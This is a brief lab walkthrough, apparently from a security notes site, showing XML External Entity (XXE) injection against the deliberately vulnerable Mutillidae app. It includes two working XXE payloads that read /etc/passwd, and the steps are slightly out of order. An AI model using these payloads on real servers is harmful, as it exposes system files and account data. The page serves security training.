XML External Entity (XXE) Injection - Mutillidae

XML External Entity (XXE) Injection - Mutillidae:

The following web page is used for reading the XML file content using the XML parser from the server side.

After clicked on the Validate XML button we got the below-parsed output.

2. let’s try to abuse the parser and try to read the robots.txt file from the web server.

<?xml version="1.0"?>
 <!DOCTYPE foo [  
  <!ELEMENT bar ANY>
  <!ENTITY file SYSTEM "/etc/passwd">
]>
<bar>&file;</bar>

3. Let’s modify the xml.txt file to contain the following code:

We can see the parser has successfully read the file from the server and display it as a response.

<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <creds> <user>&xxe;</user> <pass>mypass</pass> </creds>

PreviousA4 - XML External Entities (XXE)NextXML External Entity (XXE) Injection - DVNA

Last updated 4 years ago